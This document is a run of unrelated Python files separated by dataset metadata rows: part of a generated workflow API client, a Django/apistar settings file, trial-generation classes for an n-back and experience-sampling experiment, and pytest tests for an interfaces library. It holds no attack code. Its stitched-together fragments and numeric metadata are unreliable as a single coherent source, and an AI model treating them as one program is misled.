if self.api_client.client_side_validation and ('run_id' not in params or
params['run_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `run_id` when calling `update_workflow_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
if 'run_id' in params:
path_params['runId'] = params['run_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}/workflowRun/{runId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workflow', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_workflow(self, workflow_name, **kwargs): # noqa: E501
"""Get complete details for a workflow. # noqa: E501
Get complete details for a workflow.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.view_workflow(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Name of the Workflow. (required)
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.view_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
else:
(data) = self.view_workflow_with_http_info(workflow_name, **kwargs) # noqa: E501
return data
def view_workflow_with_http_info(self, workflow_name, **kwargs): # noqa: E501
"""Get complete details for a workflow. # noqa: E501
        Get complete details for a workflow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.view_workflow_with_http_info(workflow_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str workflow_name: Name of the Workflow. (required)
:return: Workflow
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workflow_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_workflow" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workflow_name' is set
if self.api_client.client_side_validation and ('workflow_name' not in params or
params['workflow_name'] is None): # noqa: E501
raise ValueError("Missing the required parameter `workflow_name` when calling `view_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_name' in params:
path_params['workflow_name'] = params['workflow_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/api/workflow/v1/workflow/{workflow_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Workflow', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.349708 | 217 | 0.61667 | 4,257 | 36,209 | 5.010571 | 0.055908 | 0.052133 | 0.021003 | 0.027004 | 0.962166 | 0.954946 | 0.951617 | 0.945241 | 0.943366 | 0.942804 | 0 | 0.017305 | 0.296197 | 36,209 | 854 | 218 | 42.399297 | 0.819691 | 0.35505 | 0 | 0.793407 | 1 | 0 | 0.19058 | 0.04533 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037363 | false | 0 | 0.008791 | 0 | 0.101099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
903248d5b16acf84c9bf0e00f8ae51549690a3af | 2,125 | py | Python | config/settings.py | audiolion/Envelopes-api | f9e93521dc8cb5fd8169551192e1d98f6a359c7c | [
"MIT"
] | null | null | null | config/settings.py | audiolion/Envelopes-api | f9e93521dc8cb5fd8169551192e1d98f6a359c7c | [
"MIT"
] | 4 | 2019-10-18T15:54:05.000Z | 2021-06-01T22:07:16.000Z | config/settings.py | audiolion/Envelopes-API | f9e93521dc8cb5fd8169551192e1d98f6a359c7c | [
"MIT"
] | null | null | null | import os
from apistar_jwt.authentication import JWTAuthentication
settings = {
'AUTHENTICATION': [JWTAuthentication()],
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get('DB_NAME'),
'HOST': os.environ.get('DB_HOST'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
},
},
'INSTALLED_APPS': [
'django.contrib.auth',
'django.contrib.contenttypes',
'envelopes.apps.EnvelopesConfig',
'behaviors.apps.BehaviorsConfig',
'improved_user.apps.ImprovedUserConfig',
],
'AUTH_USER_MODEL': 'improved_user.User',
'AUTH_PREFIX': '',
'AUTH_PASSWORD_VALIDATORS': [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
'OPTIONS': {
'user_attributes': ('email', 'full_name', 'short_name')
},
},
# include other password validators here
],
'HASHIDS_SALT': os.environ.get('HASHIDS_SALT'),
'SECRET_KEY': os.environ.get('SECRET_KEY'),
'JWT': {
'SECRET': os.environ.get('JWT_SECRET'),
'ID': 'user',
},
}
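# NOTE: the module-level constants below duplicate the values in the apistar
# `settings` dict above, presumably so the same values can also be imported
# Django-style.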
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get('DB_NAME'),
'HOST': os.environ.get('DB_HOST'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
},
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'envelopes.apps.EnvelopesConfig',
'behaviors.apps.BehaviorsConfig',
'improved_user.apps.ImprovedUserConfig',
]
AUTH_USER_MODEL = 'improved_user.User'
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
'OPTIONS': {
'user_attributes': ('email', 'full_name', 'short_name')
},
},
]
HASHIDS_SALT = os.environ.get('HASHIDS_SALT')
SECRET_KEY = os.environ.get('SECRET_KEY')
JWT_SECRET = os.environ.get('JWT_SECRET')
| 29.109589 | 95 | 0.601882 | 208 | 2,125 | 5.942308 | 0.245192 | 0.101942 | 0.135922 | 0.090615 | 0.883495 | 0.883495 | 0.883495 | 0.883495 | 0.883495 | 0.883495 | 0 | 0 | 0.236235 | 2,125 | 72 | 96 | 29.513889 | 0.761553 | 0.017882 | 0 | 0.461538 | 0 | 0 | 0.447962 | 0.227338 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.092308 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
5f557a90d837f7428522749efaadbe5b8f1217e3 | 20,393 | py | Python | src/datastructure/trial_library.py | htwangtw/nbackexpsampling | 510971ca9f784a372548b44d00ba1d4c4a84e0af | [
"MIT"
] | 1 | 2021-02-01T18:54:46.000Z | 2021-02-01T18:54:46.000Z | src/datastructure/trial_library.py | htwangtw/nbackexpsampling | 510971ca9f784a372548b44d00ba1d4c4a84e0af | [
"MIT"
] | 2 | 2020-11-13T10:29:05.000Z | 2021-01-27T06:51:58.000Z | src/datastructure/trial_library.py | htwangtw/nbackexpsampling | 510971ca9f784a372548b44d00ba1d4c4a84e0af | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
trial design
all kind of supporting trial types
this one needs lot of cleaning
'''
from random import choice, shuffle, uniform
from ..fileIO import create_headers
class ExpSample(object):
'''
    generate an experience sampling trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
the output of the generator is a list of dictionaries
        the keys of the dictionaries are
"Item", "Question", "Scale_low", "Scale_high"
last_trial: dict
the previous trial; some trials need this information
        if it's an experience sampling question,
zero-back or no-go trial, None type is accepted
output
dict_rows: a list of dict
            a list of trials, each as a dictionary
trial_time: a list of float
total time of each trial, for counter
'''
items = next(stimulus_generator.generate())
dict_rows = []
trial_time = []
for item in items:
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item['Scale_low']
dict_row['stimPicRight'] = item['Scale_high']
rand_marker_start = round(uniform(1, 10), 1)
dict_row['Ans'] = str(rand_marker_start)
dict_row['stimPicMid'] = item['Item']
dict_rows.append(dict_row)
trial_time.append(self.trial_spec['trial_t_total'])
yield dict_rows, trial_time
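# Hypothetical usage sketch (`spec`, `headers` and `sampler` are illustrative
# stand-ins, not defined in this module):
#
#     es = ExpSample(spec, headers)
#     rows, times = next(es.generate_trial(sampler, last_trial=None))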
class NoGo(object):
'''
    generate a no-go trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
t: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
        dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
dict_row['stimPicMid'] = None
dict_row['Ans'] = 'NA'
yield dict_row, self.trial_spec['trial_t_total']
class ZeroBack(object):
'''
generate a zero back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
        dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
dict_row['Ans'] = choice(['left', 'right'])
if dict_row['Ans'] == 'left':
dict_row['stimPicMid'] = dict_row['stimPicLeft']
else:
dict_row['stimPicMid'] = dict_row['stimPicRight']
        yield dict_row, self.trial_spec['trial_t_total']
class OneBack(object):
'''
generate a one back recall trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = '?'
dict_row['stimPicRight'] = '?'
dict_row['Ans'] = choice(['left', 'right'])
if dict_row['Ans'] == 'left':
dict_row['stimPicMid'] = last_trial['stimPicLeft']
else:
dict_row['stimPicMid'] = last_trial['stimPicRight']
        yield dict_row, self.trial_spec['trial_t_total']
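# Hypothetical usage sketch: a one-back trial recalls the previous trial's
# stimuli, so `last_trial` must be an earlier trial dict (note that here the
# argument order is (last_trial, stimulus_generator)):
#
#     ob = OneBack(spec, headers)
#     row, t = next(ob.generate_trial(previous_row, sampler))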
class ZeroBackRecog(object):
'''
    generate a zero back recognition trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
        dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
        dict_row['stimPicLeft'] = item_list[0]
        dict_row['stimPicRight'] = item_list[1]
        null = list(filter(lambda x: x not in item_list, stimulus_generator.stimuli))[0]  # filter() is lazy in Python 3
dict_row['Ans'] = choice(['yes', 'no'])
if dict_row['Ans'] == 'yes':
dict_row['stimPicMid'] = choice(item_list)
else:
dict_row['stimPicMid'] = null
        yield dict_row, self.trial_spec['trial_t_total']
class OneBackRecog(object):
'''
    generate a one back recognition trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
# create a equal chance to get a present/absent target in the pre trial
item_list = [last_trial['stimPicLeft'], last_trial['stimPicRight']]
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
        dict_row['stimPicLeft'] = '?'
        dict_row['stimPicRight'] = '?'
        null = list(filter(lambda x: x not in item_list, stimulus_generator.stimuli))[0]  # filter() is lazy in Python 3
dict_row['Ans'] = choice(['yes', 'no'])
if dict_row['Ans'] == 'yes':
dict_row['stimPicMid'] = choice(item_list)
else:
dict_row['stimPicMid'] = null
        yield dict_row, self.trial_spec['trial_t_total']
class Recognition(object):
'''
generate a one back recognition trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
        # build a distractor from the feature values absent in the previous trial,
        # then decide whether to preserve the left or right item
for f1 in stimulus_generator.feature1:
if f1 not in [last_trial['stimPicLeft'][0], last_trial['stimPicRight'][0]]:
distract_feature1 = f1
for f2 in stimulus_generator.feature2:
if f2 not in [last_trial['stimPicLeft'][1], last_trial['stimPicRight'][1]]:
distract_feature2 = f2
distractor = (distract_feature1, distract_feature2)
if choice(['left', 'right']) == 'left':
dict_row['stimPicLeft'] = last_trial['stimPicLeft']
dict_row['stimPicRight'] = distractor
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'yes'
else:
dict_row['stimPicLeft'] = distractor
dict_row['stimPicRight'] = last_trial['stimPicRight']
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'no'
        yield dict_row, self.trial_spec['trial_t_total']
class ZeroBack_feature(object):
'''
    generate a zero back (feature) trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
target_item = choice(item_list)
target_feat = choice(target_item)
        # build the probe (stimPicMid) so that it shares exactly one feature with
        # the target item; the items on screen can share at most one feature
if target_feat in stimulus_generator.feature1:
for f2 in stimulus_generator.feature2:
if f2 not in [dict_row['stimPicLeft'][1], dict_row['stimPicRight'][1]]:
distract_feature2 = f2
dict_row['stimPicMid'] = (target_feat, distract_feature2)
else:
for f1 in stimulus_generator.feature1:
if f1 not in [dict_row['stimPicLeft'][0], dict_row['stimPicRight'][0]]:
distract_feature1 = f1
dict_row['stimPicMid'] = (distract_feature1, target_feat)
if dict_row['stimPicLeft'] == target_item:
dict_row['Ans'] = 'left'
else:
dict_row['Ans'] = 'right'
        yield dict_row, self.trial_spec['trial_t_total']
class OneBack_feature(object):
'''
    generate a one back (feature) trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = '?'
dict_row['stimPicRight'] = '?'
target_item = choice([last_trial['stimPicLeft'], last_trial['stimPicRight']])
target_feat = choice(target_item)
        # build the probe so it shares exactly one feature with the target item
if target_feat in stimulus_generator.feature1:
for f2 in stimulus_generator.feature2:
if f2 not in [last_trial['stimPicLeft'][1], last_trial['stimPicRight'][1]]:
distract_feature2 = f2
dict_row['stimPicMid'] = (target_feat, distract_feature2)
else:
for f1 in stimulus_generator.feature1:
if f1 not in [last_trial['stimPicLeft'][0], last_trial['stimPicRight'][0]]:
distract_feature1 = f1
dict_row['stimPicMid'] = (distract_feature1, target_feat)
if last_trial['stimPicLeft'] == target_item:
dict_row['Ans'] = 'left'
else:
dict_row['Ans'] = 'right'
        yield dict_row, self.trial_spec['trial_t_total']
class Recognition_feature(object):
'''
    generate a recognition (feature) trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
        a generator that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
            a trial as a dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
        dict_row['stim_duration'] = self.trial_spec['trial_t_total'] - dict_row['fix_duration']
        # build a distractor from the feature values absent in the previous trial,
        # then decide whether to preserve the left or right item
for f1 in stimulus_generator.feature1:
if f1 not in [last_trial['stimPicLeft'][0], last_trial['stimPicRight'][0]]:
distract_feature1 = f1
for f2 in stimulus_generator.feature2:
if f2 not in [last_trial['stimPicLeft'][1], last_trial['stimPicRight'][1]]:
distract_feature2 = f2
distractor = (distract_feature1, distract_feature2)
if choice(['left', 'right']) == 'left':
target_item = last_trial['stimPicLeft']
target_feat = choice(target_item)
if target_feat in stimulus_generator.feature1:
dict_row['stimPicLeft'] = (target_feat, last_trial['stimPicRight'][1])
else:
dict_row['stimPicLeft'] = (last_trial['stimPicRight'][0], target_feat)
dict_row['stimPicRight'] = distractor
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'left'
else:
target_item = last_trial['stimPicRight']
target_feat = choice(target_item)
if target_feat in stimulus_generator.feature1:
dict_row['stimPicRight'] = (target_feat, last_trial['stimPicLeft'][1])
else:
dict_row['stimPicRight'] = (last_trial['stimPicLeft'][0], target_feat)
dict_row['stimPicLeft'] = distractor
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'right'
        yield dict_row, self.trial_spec['trial_t_total']
| 31.422188 | 106 | 0.620654 | 2,524 | 20,393 | 4.754754 | 0.06141 | 0.090992 | 0.084493 | 0.071994 | 0.912007 | 0.884343 | 0.870594 | 0.868344 | 0.864845 | 0.864845 | 0 | 0.005947 | 0.282597 | 20,393 | 648 | 107 | 31.470679 | 0.814354 | 0.277791 | 0 | 0.812 | 0 | 0 | 0.167267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.008 | 0 | 0.128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5f9fdfacbd96beeed83f9218ef6e77b30db9a2d5 | 4,699 | py | Python | tests/util_test.py | lig/python-interfaces | cf8c5419a827ed74732b938db82e293ea7c9f43f | [
"MIT"
] | 15 | 2019-04-29T05:35:04.000Z | 2021-07-17T01:35:19.000Z | tests/util_test.py | lig/python-interfaces | cf8c5419a827ed74732b938db82e293ea7c9f43f | [
"MIT"
] | 2 | 2019-05-04T20:51:46.000Z | 2019-05-06T07:09:32.000Z | tests/util_test.py | lig/python-interfaces | cf8c5419a827ed74732b938db82e293ea7c9f43f | [
"MIT"
] | 1 | 2020-12-04T07:37:45.000Z | 2020-12-04T07:37:45.000Z | import pytest
import interfaces
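# The session-scoped fixture below runs each test twice: once with
# interfaces.isimplementation and once with the built-in issubclass,
# checking that the two agree (except where noted in test_090).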
@pytest.fixture(scope='session', params=[interfaces.isimplementation, issubclass])
def isimplementation(request):
return request.param
def test_010_isimplementation_single_true_explicit_interface(
typeT1, typeT2, isimplementation
):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass(interfaces.object, implements=[TestInterface]):
def method(arg: typeT1) -> typeT2:
pass
assert isimplementation(TestClass, TestInterface)
def test_020_isimplementation_single_true_explicit_object(
typeT1, typeT2, isimplementation
):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass(interfaces.object):
def method(arg: typeT1) -> typeT2:
pass
assert isimplementation(TestClass, TestInterface)
def test_030_isimplementation_single_true(typeT1, typeT2, isimplementation):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass:
def method(arg: typeT1) -> typeT2:
pass
assert isimplementation(TestClass, TestInterface)
def test_040_isimplementation_single_false(typeT1, typeT2, isimplementation):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass:
pass
assert not isimplementation(TestClass, TestInterface)
def test_050_isimplementation_multi_true_one_explicit(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass(interfaces.object, implements=[TestInterfaceA, TestInterfaceB]):
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, TestInterfaceA)
def test_060_isimplementation_multi_true_one(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, TestInterfaceA)
def test_070_isimplementation_multi_true_all_explicit(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass(interfaces.object, implements=[TestInterfaceA, TestInterfaceB]):
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
def test_080_isimplementation_multi_true_all(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
def test_090_isimplementation_multi_false_one(typeT1, typeT2):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
def method_a(arg: typeT1) -> typeT1:
pass
    # NOTE: In this case `isimplementation` behaves differently from `issubclass`
assert not interfaces.isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
def test_100_isimplementation_multi_false_all(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
pass
assert not isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
| 27.970238 | 88 | 0.680783 | 467 | 4,699 | 6.69379 | 0.117773 | 0.080614 | 0.112604 | 0.143314 | 0.805502 | 0.799104 | 0.77991 | 0.776711 | 0.776711 | 0.752399 | 0 | 0.029592 | 0.23771 | 4,699 | 167 | 89 | 28.137725 | 0.843104 | 0.015535 | 0 | 0.823009 | 0 | 0 | 0.001514 | 0 | 0 | 0 | 0 | 0 | 0.088496 | 1 | 0.345133 | false | 0.265487 | 0.017699 | 0.00885 | 0.60177 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
396fa82d44b683089213c89d99af22408c5d1e95 | 57 | py | Python | pontoon/test/fixtures/__init__.py | udacity/pontoon | e15a03a0c987615385b2a8c537bb18c99567f77e | [
"BSD-3-Clause"
